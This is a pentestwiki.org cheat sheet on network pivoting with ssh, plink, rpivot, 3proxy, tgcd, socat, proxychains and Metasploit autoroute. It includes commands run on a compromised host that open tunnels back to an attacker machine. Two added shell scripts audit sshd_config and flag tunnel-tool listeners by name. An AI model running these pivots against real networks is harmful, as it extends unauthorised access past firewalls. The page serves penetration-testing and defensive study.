Pivoting

From pentestwiki.org

rinetd

root #rinetd -f -c rinetd.conf


root #cat rinetd.conf
# bindaddress bindport connectaddress connectport


$PUBLICIP 80 $IP 80


plink.exe

SSH client for Windows: plink.exe

C:\>plink -l root -pw pass -R 3389:127.0.0.1:3389 $IP -P 80 -N


ssh / OpenSSH

ssh local port forwarding ("proxy", on the attacker machine)

Local port → Remote server

root #ssh <GATEWAY/SSH server> -L <PORT>:<REMOTE SERVER>:<REMOTE PORT>
root #ssh -L <localhost port>:<remote IP>:<remote port> $IP



Remote redirection: ssh remote port forwarding ("reverse shell", run on the compromised machine)

root #ssh -R <REMOTE PORT>:<LOCAL HOST>:<LOCAL PORT> $IP
root #ssh -R <server side port>:<localhost>:<local port> $IP


With ssh -L / -R the forwarded ports are bound to 127.0.0.1 by default; to expose them on the eth0/tun0 interfaces, use tgcd or socat!


Open question: How to forward local apache in attacker machine to private LAN network through pivoting


Dynamic port forwarding (socks4/5 proxy)

root #ssh -D <LOCAL PROXY PORT> -p <REMOTE PORT> <TARGET>


VPN over SSH

/etc/ssh/sshd_config
PermitRootLogin yes
PermitTunnel yes
root #ssh <USER>@<SERVER> -w any:any


Routing is not set up automatically: add the routes and the gateway on both ends, and enable IP forwarding on the server.
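The sshd_config lines above are the server-side switches that make every ssh recipe on this page work: PermitTunnel for -w, AllowTcpForwarding for -L/-R/-D, GatewayPorts for exposing -R ports beyond loopback. The following added example (not from pentestwiki.org) audits an sshd_config for exactly those directives and shows the weak settings next to their hardened counterparts; both config samples are constructed, and the "first occurrence wins" rule and the defaults are those of current OpenSSH.

```shell
#!/bin/sh
# Added example, not from pentestwiki.org: audit an sshd_config for the
# directives that the SSH pivoting recipes on this page rely on.
# Both config samples below are constructed.

# Weak configuration: what the "VPN over SSH" recipe asks for.
WEAK_CFG='PermitRootLogin yes
PermitTunnel yes
# AllowTcpForwarding is not set, so the sshd default (yes) applies
GatewayPorts yes'

# Hardened configuration for a server that must not act as a jump host.
HARDENED_CFG='PermitRootLogin no
PermitTunnel no
AllowTcpForwarding no
GatewayPorts no
AllowStreamLocalForwarding no'

# Effective value of one directive.  Comments are stripped, the keyword is
# matched case-insensitively and only the FIRST occurrence counts, which is
# how sshd itself resolves duplicates; an absent directive yields $3.
sshd_value() {
    cfg=$1; key=$2; default=$3
    val=$(printf '%s\n' "$cfg" | sed 's/#.*//' \
          | awk -v k="$key" 'tolower($1) == tolower(k) { print $2; exit }')
    if [ -n "$val" ]; then printf '%s\n' "$val"; else printf '%s\n' "$default"; fi
}

# Print one line per directive, marking the values that enable pivoting.
# Defaults are those of current OpenSSH; PermitRootLogin is only risky when
# it is exactly "yes", the other three are risky unless they are "no".
audit_sshd_forwarding() {
    cfg=$1
    for entry in 'PermitRootLogin:prohibit-password' 'PermitTunnel:no' \
                 'AllowTcpForwarding:yes' 'GatewayPorts:no'
    do
        key=${entry%%:*}; default=${entry#*:}
        val=$(sshd_value "$cfg" "$key" "$default")
        case "$key:$val" in
            PermitRootLogin:yes) state=RISKY ;;
            PermitRootLogin:*)   state=ok ;;
            *:no)                state=ok ;;
            *)                   state=RISKY ;;
        esac
        printf '%-6s %-20s %s\n' "$state" "$key" "$val"
    done
}

# Number of RISKY directives, printed (not returned) so it survives `set -e`.
count_risky_directives() {
    audit_sshd_forwarding "$1" | awk '$1 == "RISKY" { n++ } END { print n + 0 }'
}

# Stand-alone run: compare the two samples.
echo '--- weak ---';     audit_sshd_forwarding "$WEAK_CFG"
echo '--- hardened ---'; audit_sshd_forwarding "$HARDENED_CFG"
```

On a live host feed it the effective configuration rather than the file, `audit_sshd_forwarding "$(sshd -T)"`, so that Match blocks and defaults are already resolved; the lowercase keywords sshd -T prints are handled by the case-insensitive match.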

proxychains

From compromised machine (hax0r user)

root #ssh -f -N -R 2222:127.0.0.1:22 <USER>@<ATTACKER>
root #ssh -f -N -D 127.0.0.1:8080 -p 2222 <USER>@<HOST>


Edit /etc/proxychains.conf

[ProxyList]
socks4   127.0.0.1   8080


proxychains only handles TCP connect traffic!!!! And it is incredibly slow!

root #proxychains nmap --top-ports=20 -sT -Pn $IP/24


For proxying DNS change /usr/lib/proxychains3/proxyresolv.

FreeSSHd.exe

Good to install on target for pivoting!!



tinyproxy

https://github.com/tinyproxy/tinyproxy


rpivot

  • Reverse socks proxy / Opposite to ssh -D / Supports windows credentials to use with a corporate proxy
  • Server should be started on pentester's machine and listen to incoming connections from the client.
  • Python but no dependencies


Pentester machine (listener):

$python server.py --proxy-port 1080 --server-port 9900 --server-ip $IP


Target machine (if egress traffic is not firewalled):

$python client.py --server-ip $IP --server-port 9900


3proxy

On target (can bypass the target's sshd TCP forwarding restrictions):

For SOCKS proxy:

$cat 3proxy.config
socks -p1080 # socks proxy


For port redirection:

$cat 3proxy.config
tcppm <localport> <targethost> <targetport>


Run:

$./3proxy 3proxy.config &


tgcd

tgcd is a simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
It can also be used by network analysts and security experts for penetration testing and for analyzing the security of their network.

This program has 3 different modes:

- CC (ConnectConnect)
- LL (ListenListen)
- PF (PortForwarder)

CC and LL nodes are used together to provide access to a service inside a Local
Area Network to the external network. PF node is, however, only a simple
port forwarder.


On attacker (does not support VPN):

$tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10


On target:

$tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10
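Seen from the defender's side, every tool in the sections above (ssh -D/-R, rinetd, 3proxy, tgcd, and the socat relays further down) leaves a listening TCP socket owned by a process that normally has no reason to listen. The following added example (not from pentestwiki.org) parses `ss -lntp` output and flags such listeners, noting whether each one is bound to all interfaces or to loopback only, which is the 127.0.0.1 versus eth0/tun0 distinction this page keeps coming back to. The ss output is constructed sample data; the process-name list is taken from the tools on this page.

```shell
#!/bin/sh
# Added example, not from pentestwiki.org: flag listening sockets owned by the
# pivoting tools covered on this page.  The ss output below is a constructed
# sample in the format of `ss -lntp`.

SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      4096   0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=900,fd=3))
LISTEN 0      128    0.0.0.0:1080        0.0.0.0:*         users:(("3proxy",pid=4242,fd=5))
LISTEN 0      128    127.0.0.1:8080      0.0.0.0:*         users:(("ssh",pid=4311,fd=4))
LISTEN 0      128    0.0.0.0:80          0.0.0.0:*         users:(("rinetd",pid=4400,fd=3))
LISTEN 0      128    0.0.0.0:9090        0.0.0.0:*         users:(("tgcd",pid=5100,fd=3))
LISTEN 0      511    0.0.0.0:443         0.0.0.0:*         users:(("nginx",pid=1200,fd=6))'

# Process names of the pivoting tools on this page.  "ssh" is the client
# (a -D/-R forward listening locally); the server "sshd" is deliberately
# not listed, so a normal SSH daemon is never flagged.
TUNNEL_TOOLS='ssh socat 3proxy rinetd tgcd plink'

# Print one SUSPECT line per matching LISTEN socket: pid, process name,
# local address, and whether other hosts can reach it or loopback only.
find_tunnel_listeners() {
    printf '%s\n' "$1" | awk -v names="$TUNNEL_TOOLS" '
        BEGIN { n = split(names, t, " "); for (i = 1; i <= n; i++) want[t[i]] = 1 }
        $1 == "LISTEN" && match($NF, /\(\("[^"]*"/) {
            # users:(("name",pid=N,fd=M)) -> name is between (( " and "
            name = substr($NF, RSTART + 3, RLENGTH - 4)
            pid = "?"
            if (match($NF, /pid=[0-9]+/)) pid = substr($NF, RSTART + 4, RLENGTH - 4)
            scope = ($4 ~ /^(0\.0\.0\.0|\*|\[::\]):/) ? "ALL-IFACES" : "local-only"
            if (name in want) printf "SUSPECT pid=%s %-8s %-18s %s\n", pid, name, $4, scope
        }'
}

# Number of flagged listeners, printed so a script can compare it.
count_tunnel_listeners() {
    find_tunnel_listeners "$1" | awk 'END { print NR }'
}

# Stand-alone run against the sample; on a real host use "$(ss -lntp)".
find_tunnel_listeners "$SAMPLE_SS"
```

The name match is exact, so sshd on :22 and nginx on :443 pass while the 3proxy SOCKS listener on 0.0.0.0:1080 and the ssh -D listener on 127.0.0.1:8080 are reported; the scope column separates the two cases the text above distinguishes, a forward reachable only from the box itself versus one exposed to the whole segment.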


Metasploit

msf> use auxiliary/server/socks4a
msf> run -j

or

meterpreter> run autoroute -s $IP/24
meterpreter> run autoroute -p

or

msf exploit(handler) > route add $IP 255.255.255.0 1

ssf

socat

  • Socat TCP GENDER CHANGER

On inside LAN server:

root #socat -d -d -d -t5 tcp:$IP:80,forever,intervall=10,fork tcp:localhost:80


On outside LAN client:

root #socat -d -d -d tcp-l:80,reuseaddr,bind=127.0.0.1,fork tcp-l:80,bind=$IP,reuseaddr,retry=10


Connect with outside client:


  • Socat SSH encapsulation into SSL

On server:

root #socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'


On client:

root #ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080'" $SERVER


  • Socat SSH deception (bounces the connection back to the client's own ssh server)
root #socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"

Source: https://twitter.com/climagic/status/1079026659435704320


See also socat
